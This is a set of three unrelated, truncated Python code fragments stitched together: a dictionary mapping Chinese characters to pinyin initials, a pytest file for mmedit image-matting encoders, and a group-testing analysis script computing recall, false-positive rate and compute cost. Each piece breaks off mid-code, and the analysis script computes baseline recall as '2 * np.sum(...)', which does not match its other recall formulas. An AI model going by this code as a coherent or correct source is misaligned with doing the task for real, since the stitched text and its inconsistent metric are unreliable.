u'譐' : [u'z'] ,
u'睘' : [u'q'] ,
u'寛' : [u'k'] ,
u'蓥' : [u'y'] ,
u'潨' : [u'z'] ,
u'热' : [u'r'] ,
u'顲' : [u'l'] ,
u'䝸' : [u'j'] ,
u'棽' : [u'c', u's'] ,
u'刁' : [u'd'] ,
u'㾈' : [u'f'] ,
u'茋' : [u'd'] ,
u'粊' : [u'b'] ,
u'䨑' : [u't'] ,
u'咚' : [u'd'] ,
u'朣' : [u't'] ,
u'薤' : [u'x'] ,
u'䲪' : [u'x'] ,
u'逭' : [u'h'] ,
u'熬' : [u'a'] ,
u'弳' : [u'j'] ,
u'蠽' : [u'j'] ,
u'榼' : [u'k'] ,
u'㝃' : [u'm', u'w', u'f'] ,
u'瑅' : [u't'] ,
u'髆' : [u'b'] ,
u'䇌' : [u'q'] ,
u'汕' : [u's'] ,
u'㧜' : [u'l'] ,
u'鵟' : [u'k'] ,
u'绞' : [u'j'] ,
u'䑥' : [u's', u'e'] ,
u'囮' : [u'y', u'e'] ,
u'㱵' : [u'b', u'f'] ,
u'慷' : [u'k'] ,
u'蟸' : [u'l'] ,
u'仾' : [u'd'] ,
u'琀' : [u'h'] ,
u'傃' : [u's'] ,
u'鎅' : [u'j'] ,
u'㴆' : [u'x', u'j'] ,
u'氐' : [u'z', u'd'] ,
u'䢓' : [u'y'] ,
u'讕' : [u'l'] ,
u'羝' : [u'd'] ,
u'䐠' : [u'h'] ,
u'蜢' : [u'm'] ,
u'垭' : [u'y', u'w'] ,
u'㰰' : [u'q'] ,
u'挺' : [u't'] ,
u'侽' : [u'n'] ,
u'調' : [u'z', u'd', u't'] ,
u'织' : [u'z'] ,
u'孊' : [u'm'] ,
u'虌' : [u'b'] ,
u'囗' : [u'w'] ,
u'釙' : [u'p'] ,
u'扤' : [u'w'] ,
u'仧' : [u'c', u'z'] ,
u'觩' : [u'q'] ,
u'緱' : [u'g'] ,
u'婴' : [u'y'] ,
u'蕶' : [u'l'] ,
u'包' : [u'b'] ,
u'鸇' : [u'z'] ,
u'憎' : [u'z'] ,
u'䬕' : [u's'] ,
u'稟' : [u'b', u'l'] ,
u'妞' : [u'n'] ,
u'蒠' : [u'x'] ,
u'刯' : [u'g'] ,
u'鴱' : [u'a'] ,
u'悸' : [u'j'] ,
u'䨿' : [u'q', u'z'] ,
u'祉' : [u'z'] ,
u'壈' : [u'l'] ,
u'鯊' : [u's'] ,
u'柢' : [u'd'] ,
u'䥩' : [u'w'] ,
u'忲' : [u't'] ,
u'髴' : [u'f'] ,
u'颉' : [u'x', u'j'] ,
u'㨊' : [u'w'] ,
u'朌' : [u'b', u'f'] ,
u'䎏' : [u'a', u'h'] ,
u'鐖' : [u'j'] ,
u'弜' : [u'q', u'j'] ,
u'㮟' : [u'p', u'r', u'j', u'n'] ,
u'撡' : [u'c'] ,
u'谦' : [u'q'] ,
u'閫' : [u'k'] ,
u'岱' : [u'd'] ,
u'趻' : [u'c'] ,
u'栾' : [u'l'] ,
u'㓁' : [u'w'] ,
u'燃' : [u'r'] ,
u'饈' : [u'x'] ,
u'䁎' : [u'c'] ,
u'槓' : [u'g'] ,
u'黝' : [u'y'] ,
u'㡞' : [u'l'] ,
u'敠' : [u'd'] ,
u'䇣' : [u'y', u'n'] ,
u'嵰' : [u'q'] ,
u'㧳' : [u'b', u'z'] ,
u'竵' : [u'h'] ,
u'艺' : [u'y'] ,
u'㖀' : [u'l'] ,
u'鄃' : [u'y', u's'] ,
u'皂' : [u'z'] ,
u'堉' : [u'y'] ,
u'褓' : [u'b'] ,
u'溒' : [u'y'] ,
u'紛' : [u'f'] ,
u'龜' : [u'q', u'j', u'g'] ,
u'䚢' : [u'c'] ,
u'唫' : [u'y'] ,
u'㺲' : [u'n'] ,
u'騵' : [u'y'] ,
u'箴' : [u'z', u'j'] ,
u'䴻' : [u'l'] ,
u'叄' : [u'c', u's'] ,
u'晍' : [u't'] ,
u'胎' : [u't'] ,
u'䯔' : [u'c', u'z'] ,
u'靗' : [u'c'] ,
u'瓖' : [u'x'] ,
u'幝' : [u'c'] ,
u'轧' : [u'y', u'z', u'g'] ,
u'泦' : [u'j'] ,
u'獯' : [u'x'] ,
u'鷰' : [u'y'] ,
u'䓶' : [u'l'] ,
u'歿' : [u'm'] ,
u'稈' : [u'g'] ,
u'䚋' : [u'y'] ,
u'薍' : [u'l', u'w'] ,
u'刘' : [u'l'] ,
u'㺛' : [u'z'] ,
u'鄚' : [u'm'] ,
u'憥' : [u'l'] ,
u'褪' : [u't'] ,
u'紲' : [u'y', u'x'] ,
u'妵' : [u't'] ,
u'蒷' : [u'y'] ,
u'啂' : [u'n'] ,
u'遄' : [u'c'] ,
u'惏' : [u'l'] ,
u'䵒' : [u'n'] ,
u'衔' : [u'x'] ,
u'籜' : [u't'] ,
u'壟' : [u'l'] ,
u'蟡' : [u'g'] ,
u'呬' : [u'x'] ,
u'鍮' : [u't'] ,
u'揹' : [u'b'] ,
u'䱼' : [u'z'] ,
u'譾' : [u'j'] ,
u'羆' : [u'p'] ,
u'耏' : [u'e', u'n'] ,
u'琗' : [u'c'] ,
u'垖' : [u'd'] ,
u'銘' : [u'm'] ,
u'㴝' : [u'l'] ,
u'氧' : [u'y'] ,
u'侦' : [u'z'] ,
u'誨' : [u'h'] ,
u'纰' : [u'p', u'b'] ,
u'茹' : [u'r'] ,
u'睁' : [u'z'] ,
u'囀' : [u'z'] ,
u'闂' : [u'x'] ,
u'㱇' : [u's'] ,
u'潑' : [u'p', u'b'] ,
u'仐' : [u's'] ,
u'跒' : [u'q'] ,
u'燚' : [u'y'] ,
u'䝡' : [u'm'] ,
u'艣' : [u'l'] ,
u'癫' : [u'd'] ,
u'槪' : [u'g'] ,
u'铬' : [u'l', u'g'] ,
u'㽱' : [u'j'] ,
u'湻' : [u'c', u'z'] ,
u'䇺' : [u'c', u'd'] ,
u'購' : [u'g'] ,
u'隁' : [u'y'] ,
u'焄' : [u'x', u'h'] ,
u'嶇' : [u'q'] ,
u'躑' : [u'z'] ,
u'椔' : [u'z'] ,
u'㖗' : [u'y'] ,
u'犙' : [u's'] ,
u'騞' : [u'h'] ,
u'䄤' : [u'l'] ,
u'檩' : [u'l'] ,
u'鮳' : [u'k'] ,
u'㤴' : [u'x'] ,
u'昶' : [u'c'] ,
u'靀' : [u'm'] ,
u'幆' : [u'y'] ,
u'柋' : [u'd'] ,
u'轐' : [u'p', u'b'] ,
u'獘' : [u'b'] ,
u'忛' : [u'f'] ,
u'胥' : [u'x'] ,
u'歨' : [u'b'] ,
u'㟫' : [u'q'] ,
u'瓭' : [u'd'] ,
u'鱲' : [u'l'] ,
u'䍸' : [u'b'] ,
u'泽' : [u'y', u's', u'z', u'd'] ,
u'嘁' : [u'q'] ,
u'㮈' : [u'n'] ,
u'蜋' : [u'l'] ,
u'碊' : [u'j'] ,
u'丑' : [u'c'] ,
u'傚' : [u'x'] ,
u'挣' : [u'z'] ,
u'䢪' : [u'q', u'n', u'c', u'b', u'j'] ,
u'鐭' : [u'y'] ,
u'疬' : [u'l'] ,
u'谽' : [u'h'] ,
u'涼' : [u'l'] ,
u'灅' : [u'l'] ,
u'黆' : [u'g'] ,
u'桕' : [u'j', u'g'] ,
u'饟' : [u'x'] ,
u'竞' : [u'j'] ,
u'䁥' : [u'n'] ,
u'勮' : [u'j'] ,
u'㡵' : [u'l'] ,
u'敷' : [u'f'] ,
u'菸' : [u'y'] ,
u'䫾' : [u'b'] ,
u'砀' : [u'd'] ,
u'龅' : [u'p'] ,
u'怐' : [u'k'] ,
u'䒓' : [u'k'] ,
u'螕' : [u'b'] ,
u'玝' : [u'w'] ,
u'䠠' : [u'c'] ,
u'宭' : [u'q'] ,
u'麯' : [u'q'] ,
u'漺' : [u'c'] ,
u'䎽' : [u'w'] ,
u'蚿' : [u'x'] ,
u'狇' : [u'm'] ,
u'坊' : [u'f'] ,
u'詌' : [u'g'] ,
u'嫗' : [u'y'] ,
u'鷙' : [u'z'] ,
u'㽚' : [u'c'] ,
u'湤' : [u's'] ,
u'䋧' : [u'q'] ,
u'藩' : [u'f'] ,
u'燱' : [u'y'] ,
u'噴' : [u'p'] ,
u'襶' : [u'd'] ,
u'弅' : [u'f'] ,
u'㺄' : [u'y'] ,
u'鈇' : [u'f'] ,
u'涎' : [u'y', u'x', u'd'] ,
u'䜕' : [u'm'] ,
u'瘟' : [u'y', u'w'] ,
u'喞' : [u'j'] ,
u'袠' : [u'z'] ,
u'帯' : [u'd'] ,
u'鄱' : [u'p'] ,
u'沸' : [u'f'] ,
u'䘿' : [u'j'] ,
u'畉' : [u'f'] ,
u'哈' : [u'h'] ,
u'韊' : [u'l'] ,
u'遛' : [u'l'] ,
u'毢' : [u's'] ,
u'䕩' : [u'l'] ,
u'瑳' : [u'c'] ,
u'史' : [u's'] ,
u'雴' : [u'l'] ,
u'钉' : [u'd'] ,
u'㘊' : [u'y'] ,
u'侏' : [u'z'] ,
u'頖' : [u'p'] ,
u'匜' : [u'y'] ,
u'㞟' : [u'd'] ,
u'梡' : [u'h', u'k'] ,
u'耦' : [u'o'] ,
u'馫' : [u'x'] ,
u'㬬' : [u'j'] ,
u'簮' : [u'z'] ,
u'傱' : [u's'] ,
u'膻' : [u's', u'd', u't'] ,
u'搾' : [u'z'] ,
u'㣁' : [u'b'] ,
u'緃' : [u'z'] ,
u'镈' : [u'b'] ,
u'䱎' : [u'g'] ,
u'旓' : [u's'] ,
u'鋝' : [u'l'] ,
u'㑞' : [u'y'] ,
u'楠' : [u'n'] ,
u'兰' : [u'l'] ,
u'㗳' : [u't'] ,
u'盵' : [u'q'] ,
u'蹺' : [u'q'] ,
u'㦀' : [u'f'] ,
u'鴃' : [u'j'] ,
u'窂' : [u'l'] ,
u'吉' : [u'j'] ,
u'蔓' : [u'm', u'w'] ,
u'抒' : [u's'] ,
u'㰙' : [u'n'] ,
u'焛' : [u'l'] ,
u'鎜' : [u'p'] ,
u'夫' : [u'f'] ,
u'阵' : [u'z'] ,
u'瞴' : [u'm'] ,
u'䄻' : [u'c', u'z', u't'] ,
u'橍' : [u'r'] ,
u'賎' : [u'j'] ,
u'䟔' : [u'f'] ,
u'魗' : [u'c'] ,
u'磖' : [u'l'] ,
u'剝' : [u'b'] ,
u'荧' : [u'y'] ,
u'惦' : [u'd'] ,
u'㩭' : [u'x', u'b', u'j'] ,
u'罯' : [u'a'] ,
u'釰' : [u'r'] ,
u'䣶' : [u'h', u't'] ,
u'板' : [u'b'] ,
u'瘈' : [u'c', u'j', u'z'] ,
u'䪋' : [u'w'] ,
u'覍' : [u'p', u'b'] ,
u'帘' : [u'l'] ,
u'鴚' : | |
from collections.abc import Iterable
import numpy as np
import pytest
import torch
from mmcv.utils.parrots_wrapper import _BatchNorm
from mmedit.models.backbones import (VGG16, DepthwiseIndexBlock,
FBAResnetDilated, HolisticIndexBlock,
IndexNetEncoder, ResGCAEncoder, ResNetEnc,
ResShortcutEnc)
from mmedit.models.backbones.encoder_decoders.encoders.resnet import (
BasicBlock, Bottleneck)
def check_norm_state(modules, train_state):
    """Check if norm layer is in correct train state."""
    return all(mod.training == train_state
               for mod in modules if isinstance(mod, _BatchNorm))
def is_block(modules):
    """Check if `modules` is a ResNet building block.

    Args:
        modules: object to check.

    Returns:
        bool: True if `modules` is a BasicBlock or Bottleneck instance.
    """
    # isinstance already returns a bool; no need for if/return True/False
    return isinstance(modules, (BasicBlock, Bottleneck))
def assert_tensor_with_shape(tensor, shape):
    """Check if the shape of the tensor is equal to the target shape.

    Args:
        tensor (torch.Tensor): object to check.
        shape (torch.Size | tuple): expected shape.
    """
    # informative messages make pytest failures self-explanatory
    assert isinstance(tensor, torch.Tensor), (
        f'expected a torch.Tensor, got {type(tensor)}')
    assert tensor.shape == shape, (
        f'shape mismatch: got {tuple(tensor.shape)}, expected {tuple(shape)}')
def assert_mid_feat_shape(mid_feat, target_shape):
    """Check that all five intermediate features match the target shapes."""
    assert len(mid_feat) == 5
    for idx, feat in enumerate(mid_feat):
        assert_tensor_with_shape(feat, torch.Size(target_shape[idx]))
def _demo_inputs(input_shape=(2, 4, 64, 64)):
"""
Create a superset of inputs needed to run encoder.
Args:
input_shape (tuple): input batch dimensions.
Default: (1, 4, 64, 64).
"""
img = np.random.random(input_shape).astype(np.float32)
img = torch.from_numpy(img)
return img
def _assert_vgg16_outputs(outputs, out_shape, target_shape):
    """Check the VGG16 encoder output and its five max-pooling index maps."""
    assert_tensor_with_shape(outputs['out'], out_shape)
    for i in range(5):
        assert_tensor_with_shape(outputs[f'max_idx_{i + 1}'], target_shape[i])


def test_vgg16_encoder():
    """Test VGG16 encoder.

    The same three model configurations (plain, batch-norm, ASPP) are run on
    CPU and, when available, on GPU; previously the assertions were copied
    six times verbatim.
    """
    target_shape = [(2, 64, 32, 32), (2, 128, 16, 16), (2, 256, 8, 8),
                    (2, 512, 4, 4), (2, 512, 2, 2)]

    def _run(model, cuda=False):
        # Initialize, switch to train mode, and forward a demo batch.
        model.init_weights()
        model.train()
        if cuda:
            model.cuda()
        img = _demo_inputs()
        if cuda:
            img = img.cuda()
        return model(img)

    for use_cuda in ([False, True] if torch.cuda.is_available() else [False]):
        # plain VGG16
        outputs = _run(VGG16(4), cuda=use_cuda)
        _assert_vgg16_outputs(outputs, (2, 512, 2, 2), target_shape)
        # with batch normalization
        outputs = _run(VGG16(4, batch_norm=True), cuda=use_cuda)
        _assert_vgg16_outputs(outputs, (2, 512, 2, 2), target_shape)
        # with ASPP head (reduces output channels to 256)
        model = VGG16(4, aspp=True, dilations=[6, 12, 18])
        outputs = _run(model, cuda=use_cuda)
        _assert_vgg16_outputs(outputs, (2, 256, 2, 2), target_shape)
        assert check_norm_state(model.modules(), True)
def test_resnet_encoder():
    """Test resnet encoder."""
    with pytest.raises(NotImplementedError):
        ResNetEnc('UnknownBlock', [3, 4, 4, 2], 3)
    with pytest.raises(TypeError):
        model = ResNetEnc('BasicBlock', [3, 4, 4, 2], 3)
        model.init_weights(list())

    # Run each configuration on CPU first, then again on GPU when available.
    for use_cuda in ([False, True] if torch.cuda.is_available() else [False]):
        # spectral-norm variant; trimap has 1 channel (4 input channels)
        model = ResNetEnc(
            'BasicBlock', [3, 4, 4, 2], 4, with_spectral_norm=True)
        assert hasattr(model.conv1.conv, 'weight_orig')
        model.init_weights()
        model.train()
        img = _demo_inputs((2, 4, 64, 64))
        if use_cuda:
            model.cuda()
            img = img.cuda()
        assert_tensor_with_shape(model(img), torch.Size([2, 512, 2, 2]))

        # late-downsample variant; image and trimap have 3 channels each
        model = ResNetEnc('BasicBlock', [3, 4, 4, 2], 6, late_downsample=True)
        model.init_weights()
        model.train()
        img = _demo_inputs((2, 6, 64, 64))
        if use_cuda:
            model.cuda()
            img = img.cuda()
        assert_tensor_with_shape(model(img), torch.Size([2, 512, 2, 2]))
def test_res_shortcut_encoder():
    """Test resnet encoder with shortcut."""
    with pytest.raises(NotImplementedError):
        ResShortcutEnc('UnknownBlock', [3, 4, 4, 2], 3)

    target_shape = [(2, 32, 64, 64), (2, 32, 32, 32), (2, 64, 16, 16),
                    (2, 128, 8, 8), (2, 256, 4, 4)]
    # target shape for model with late downsample
    target_late_ds_shape = [(2, 32, 64, 64), (2, 64, 32, 32), (2, 64, 16, 16),
                            (2, 128, 8, 8), (2, 256, 4, 4)]

    def _check_outputs(outputs, feat_shapes):
        # Verify the final output and the five shortcut feature maps.
        assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
        for idx, feat_shape in enumerate(feat_shapes):
            assert_tensor_with_shape(outputs[f'feat{idx + 1}'], feat_shape)

    # Run once on CPU and, when available, repeat the same cases on GPU.
    for use_cuda in ([False, True] if torch.cuda.is_available() else [False]):
        # spectral-norm variant; trimap has 1 channel (4 input channels)
        model = ResShortcutEnc(
            'BasicBlock', [3, 4, 4, 2], 4, with_spectral_norm=True)
        assert hasattr(model.conv1.conv, 'weight_orig')
        model.init_weights()
        model.train()
        img = _demo_inputs((2, 4, 64, 64))
        if use_cuda:
            model.cuda()
            img = img.cuda()
        _check_outputs(model(img), target_shape)

        # both image and trimap have 3 channels (6 input channels)
        model = ResShortcutEnc('BasicBlock', [3, 4, 4, 2], 6)
        model.init_weights()
        model.train()
        img = _demo_inputs((2, 6, 64, 64))
        if use_cuda:
            model.cuda()
            img = img.cuda()
        _check_outputs(model(img), target_shape)

        # resnet shortcut encoder with late downsample
        model = ResShortcutEnc(
            'BasicBlock', [3, 4, 4, 2], 6, late_downsample=True)
        model.init_weights()
        model.train()
        img = _demo_inputs((2, 6, 64, 64))
        if use_cuda:
            model.cuda()
            img = img.cuda()
        _check_outputs(model(img), target_late_ds_shape)
def test_res_gca_encoder():
    """Test resnet encoder with shortcut and guided contextual attention."""
    with pytest.raises(NotImplementedError):
        ResGCAEncoder('UnknownBlock', [3, 4, 4, 2], 3)

    target_shape = [(2, 32, 64, 64), (2, 32, 32, 32), (2, 64, 16, 16),
                    (2, 128, 8, 8), (2, 256, 4, 4)]
    # target shape for model with late downsample
    target_late_ds = [(2, 32, 64, 64), (2, 64, 32, 32), (2, 64, 16, 16),
                      (2, 128, 8, 8), (2, 256, 4, 4)]

    def _check_outputs(outputs, feat_shapes):
        # Verify output, GCA intermediates, and the five shortcut features.
        assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
        assert_tensor_with_shape(outputs['img_feat'], (2, 128, 8, 8))
        assert_tensor_with_shape(outputs['unknown'], (2, 1, 8, 8))
        for idx, feat_shape in enumerate(feat_shapes):
            assert_tensor_with_shape(outputs[f'feat{idx + 1}'], feat_shape)

    # Run once on CPU and, when available, repeat the same cases on GPU.
    for use_cuda in ([False, True] if torch.cuda.is_available() else [False]):
        # trimap has 1 channel (4 input channels)
        model = ResGCAEncoder('BasicBlock', [3, 4, 4, 2], 4)
        model.init_weights()
        model.train()
        img = _demo_inputs((2, 4, 64, 64))
        if use_cuda:
            model.cuda()
            img = img.cuda()
        _check_outputs(model(img), target_shape)

        # both image and trimap have 3 channels (6 input channels)
        model = ResGCAEncoder('BasicBlock', [3, 4, 4, 2], 6)
        model.init_weights()
        model.train()
        img = _demo_inputs((2, 6, 64, 64))
        if use_cuda:
            model.cuda()
            img = img.cuda()
        _check_outputs(model(img), target_shape)

        # late-downsample variant
        model = ResGCAEncoder(
            'BasicBlock', [3, 4, 4, 2], 6, late_downsample=True)
        model.init_weights()
        model.train()
        img = _demo_inputs((2, 6, 64, 64))
        if use_cuda:
            model.cuda()
            img = img.cuda()
        _check_outputs(model(img), target_late_ds)
def test_index_blocks():
"""Test index blocks for indexnet encoder."""
# test holistic index block
# test holistic index block without context and nonlinearty
block = HolisticIndexBlock(128, use_context=False, | |
<gh_stars>1-10
import os
import pickle

import numpy as np
from sklearn.metrics import classification_report, confusion_matrix, accuracy_score, roc_auc_score, roc_curve
# Output directory, presumably for generated plots — not referenced in the
# visible part of this script; verify against downstream plotting code.
ROOT_DIR = 'plotout/'
# Machine-specific absolute path to the group-testing dataset.
GROUP_TESTING_DATASET_PATH = '/data/weixin/data/GroupTestingDataset'
def load_validate_dump(pkl_name, pkl_dir='./prediction_cache_0.1/', verbose=False,
                       confidence_threshold=0.5):
    """Load cached prediction scores and targets from a pickle dump.

    Args:
        pkl_name (str): file name of the pickle dump.
        pkl_dir (str): directory containing the dump. Works with or without
            a trailing slash (previously the path was built by raw string
            concatenation, which required the trailing slash).
        verbose (bool): if True, print the file name and a confusion matrix
            thresholded at ``confidence_threshold``.
        confidence_threshold (float): score cutoff; only used for the
            verbose confusion-matrix report.

    Returns:
        tuple: ``(pred_score_all, target_all)`` exactly as stored in the dump.
    """
    with open(os.path.join(pkl_dir, pkl_name), "rb") as pkl_file:
        evaluate_dict = pickle.load(pkl_file)
    target_all = evaluate_dict['target_all']
    pred_score_all = evaluate_dict['pred_score_all']
    if verbose:
        print("Working On:", pkl_name)
        pred_label = (pred_score_all > confidence_threshold)
        print("confusion_matrix")
        print(confusion_matrix(target_all, pred_label))
    return pred_score_all, target_all
def main_analysis():
##################################
# Individual Testing Baseline; K=0
##################################
print("##################################")
print("[ Individual Testing K0 Baseline ]")
K0_score, K0_target = load_validate_dump(pkl_name="ResNeXt101FullK0.pkl", verbose=True)
K0_recall = 2 * np.sum( np.logical_and(K0_target, K0_score>0.5) )
K0_FPR = 100 * np.sum( np.logical_and(K0_target==0, K0_score>0.5) ) / np.sum(K0_target==0) # False Positive Rate
print("Recall(%): {} FPR(%): {:3f}".format(K0_recall, K0_FPR))
K0_tests = len(K0_target)
# print("Number of Tests (1st Round): ", K0_tests)
each_K0_GigaMACs = 16.5 # 16.5 GMacs per test
K0_MACs = each_K0_GigaMACs /1000 * K0_tests # TMacs 10^12
print("Number of Tests (1st Round): ", K0_tests)
print("Total Computation: {:.1f} TMACs".format(K0_MACs))
del K0_score, K0_target, each_K0_GigaMACs
##################################
# note that each_K0_GigaMACs and K0_score would be re-used by downstream modules
##################################
##################################
# Algorithm 1 Wrapper Function
##################################
def algorithm_1_wrapper(
pkl_name:str,
exp_title:str,
each_method_GigaMACs:float, # GMacs per test. M images in total.
group_size:int, # M value in the paper
confidence_threshold:float=0.5,
pkl_dir='./prediction_cache_0.1/', # default root dir
):
print("##################################")
print(exp_title)
method_score, method_target = load_validate_dump(pkl_dir=pkl_dir, pkl_name=pkl_name, verbose=True, confidence_threshold=confidence_threshold)
method_tests_Round_1 = len(method_target)
method_TeraMACs_Round_1 = each_method_GigaMACs / 1000 * method_tests_Round_1 # TMacs 10^12
print("Number of Tests (1st Round): ", method_tests_Round_1, "\t Computation: {:.1f} TMACs".format(method_TeraMACs_Round_1))
method_Round_1_next = np.repeat( (method_score>confidence_threshold), group_size) # times group size
print("Number Of Samples After the 1st round:", np.sum(method_Round_1_next))
K0_score, K0_target = load_validate_dump(pkl_dir=pkl_dir, pkl_name="ResNeXt101FullK0.pkl", verbose=False)
method_recall = 100 * np.sum( np.logical_and(
np.logical_and(K0_target, K0_score>0.5),
method_Round_1_next) ) / np.sum(K0_target==1) # use K0 model as the second round
method_FPR = 100 * np.sum( np.logical_and(
np.logical_and(K0_target==0, K0_score>0.5),
method_Round_1_next)
) / np.sum(K0_target==0) # False Positive Rate
print("Recall(%): {} FPR(%): {:3f}".format(method_recall, method_FPR))
method_tests_Round_2 = np.sum(method_Round_1_next)
each_K0_GigaMACs = 16.5 # 16.5 GMacs per test, same as the baseline model
method_TeraMACs_Round_2 = each_K0_GigaMACs / 1000 * method_tests_Round_2 # TMacs 10^12
print("Number of Tests (2nd Round): ", method_tests_Round_2, "\t Computation: {:.1f} TMACs".format(method_TeraMACs_Round_2))
method_TeraMACs_total = method_TeraMACs_Round_1 + method_TeraMACs_Round_2
method_tests_total = method_tests_Round_1 + method_tests_Round_2
print("Total Computation: {:.1f} TeraMACs".format(method_TeraMACs_total), "Total Tests:", method_tests_total, "Relative Cost", method_TeraMACs_total/805.2)
result_dict = {
'method_score': method_score, # raw outputs
'method_target': method_target, # raw outputs
'method_recall': method_recall, # performance metrics
'method_FPR': method_FPR, # performance metrics
'method_tests_Round_1': method_tests_Round_1, # computation cost metrics
'method_tests_Round_2': method_tests_Round_2, # computation cost metrics
'method_TeraMACs_Round_1': method_TeraMACs_Round_1, # computation cost metrics
'method_TeraMACs_Round_2': method_TeraMACs_Round_2, # computation cost metrics
'method_TeraMACs_total': method_TeraMACs_total, # computation cost metrics
}
return result_dict
##################################
# MixupK1 Baseline + only Algorithm 1
##################################
MixupK1_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK1Mixup.pkl',
exp_title='Design 1 Mixup K1 + Algorithm 1 Two-Round',
each_method_GigaMACs=16.5,
group_size=2)
##################################
# MixupK3 Baseline + only Algorithm 1
##################################
MixupK3_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK3Mixup.pkl',
exp_title='Design 1 Mixup K3 + Algorithm 1 Two-Round',
each_method_GigaMACs=16.5,
group_size=4,
)
##################################
# Now We Explore Design 2. And group size 8, 16. And potentially Algorithm 2.
# Start with Design 2 + Algorithm 1 + Group Size + LayerGroup 1/2
##################################
##################################
# Try G2 K=1
##################################
K1G2_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_imgnet_G2K1.pkl',
exp_title='K=1 + Design 2 (G2) + Algorithm 1 Two-Round',
each_method_GigaMACs=20.16,
group_size=2,
)
##################################
# Try G2 K=3
##################################
K3G2_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_imgnet_G2K3.pkl',
exp_title='K=3 + Design 2 (G2) + Algorithm 1 Two-Round',
each_method_GigaMACs=27.46,
group_size=4,
)
##################################
# Try G2 K=7
##################################
K7G2_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_imgnet_G2.pkl',
exp_title='K=7 + Design 2 (G2) + Algorithm 1 Two-Round',
each_method_GigaMACs=42.06,
group_size=8,
)
##################################
# Try G2 K=15
##################################
K15G2_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_imgnet_G2K15.pkl',
exp_title='K=15 + Design 2 (G2) + Algorithm 1 Two-Round',
each_method_GigaMACs=71.27,
group_size=16,
)
##################################
# Try G2 K=31
# Very Expensive. Since there are too many false positives
# need to be with very good confidence threshold
##################################
K31G2_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_imgnet_G2K31.pkl',
exp_title='K=31 + Design 2 (G2) + Algorithm 1 Two-Round',
each_method_GigaMACs=129.68,
group_size=32,
)
##################################
# Now we switch to Group 1
# Try G1 K=1, smaller per forward cost, but less accurate
##################################
K1G1_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK1_imgnet_G1.pkl',
exp_title='K=1 + Design 2 (G1) + Algorithm 1 Two-Round',
each_method_GigaMACs=17.95,
group_size=2,
)
##################################
# Try G2 K=3
##################################
K3G1_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK3_imgnet_G1.pkl',
exp_title='K=3 + Design 2 (G1) + Algorithm 1 Two-Round',
each_method_GigaMACs=20.85,
group_size=4,
)
##################################
# Try G2 K=7
##################################
K7G1_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_imgnet_G1.pkl',
exp_title='K=7 + Design 2 (G1) + Algorithm 1 Two-Round',
each_method_GigaMACs=26.64,
group_size=8,
)
##################################
# Design 3, hierarchical design
##################################
TREE022_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_TREE024_G2_022.pkl',
exp_title='Design 3 (Tree022) + K=3 + Algorithm 1 Two-Round',
each_method_GigaMACs=23.05,
group_size=4,
)
TREE024_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_TREE024_G2.pkl',
exp_title='Design 3 (Tree024) + K=7 + Algorithm 1 Two-Round',
each_method_GigaMACs=33.25,
group_size=8,
)
TREE028_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_TREE024_G2_028.pkl',
exp_title='Design 3 (Tree028) + K=15 + Algorithm 1 Two-Round',
each_method_GigaMACs=53.65,
group_size=16,
)
##################################
# Algorithm 2 Wrapper Function
##################################
##################################
# Algorithm 2 Wrapper Function: Multi Round Testing
# Intermediate Using: ResNeXt101FullK7_imgnet_G2K1, ResNeXt101FullK7_imgnet_G2K3, K0_target
##################################
def algorithm_2_wrapper(
pkl_name:str,
exp_title:str,
each_method_GigaMACs:float, # GMacs per test. M images in total.
group_size:int, # M value in the paper
confidence_threshold:float=0.5,
pkl_dir='./prediction_cache_0.1/', # default root dir
):
print("##################################")
print(exp_title)
method_score, method_target = load_validate_dump(pkl_name=pkl_name, pkl_dir=pkl_dir, verbose=True, confidence_threshold=confidence_threshold)
method_tests_Round_1 = len(method_target)
method_TeraMACs_Round_1 = each_method_GigaMACs / 1000 * method_tests_Round_1 # TMacs 10^12
print("Number of Tests (1st Round): ", method_tests_Round_1, "\t Computation: {:.1f} TMACs".format(method_TeraMACs_Round_1))
method_Round_1_next = np.repeat( (method_score>confidence_threshold), group_size) # times group size
print("Number Of Samples After the 1st round:", np.sum(method_Round_1_next))
##################################
# Algorithm 2 comes in here
# Insert a Round-2
##################################
if group_size == 8:
# scheme 1: M=8, 4 K1G2 (ResNeXt101FullK7_imgnet_G2K1.pkl) + 2 base (vary with positives in K1G2)
# candidates: ResNeXt101FullK7_imgnet_G2.pkl, ResNeXt101FullK7_TREE042_G2.pkl, ResNeXt101FullK7_TREE024_G2.pkl
# 2nd-level: use K1G2
each_2nd_GigaMACs = 20.16 - 7.3 # could minus the base feature extraction
group_size_2nd = 2
method_2nd_level_score, _ = load_validate_dump(pkl_dir=pkl_dir, pkl_name='ResNeXt101FullK7_imgnet_G2K1.pkl', verbose=False, confidence_threshold=0.5)
elif group_size == 16:
# scheme 2: M=16, 4 K3G2 (ResNeXt101FullK7_imgnet_G2K3.pkl) + 4 base (vary with positives in K1G2)
# candidates: ResNeXt101FullK7_imgnet_G2K15.pkl, ResNeXt101FullK7_TREE024_G2_028.pkl
# 2nd-level: use K3G2
each_2nd_GigaMACs = 27.46 - 14.6 # could minus the base feature extraction
group_size_2nd = 4
method_2nd_level_score, _ = load_validate_dump(pkl_dir=pkl_dir, pkl_name='ResNeXt101FullK7_imgnet_G2K3.pkl', verbose=False, confidence_threshold=0.5)
else:
raise NotImplementedError()
method_2nd_level_score_repeat = np.repeat(method_2nd_level_score, group_size_2nd)
method_Round_2_next = np.logical_and(method_Round_1_next, method_2nd_level_score_repeat>0.5)
method_tests_Round_2 = np.sum(method_Round_1_next) // group_size_2nd # div group size second level
method_TeraMACs_Round_2 = each_2nd_GigaMACs / 1000 * method_tests_Round_2 # TMacs 10^12
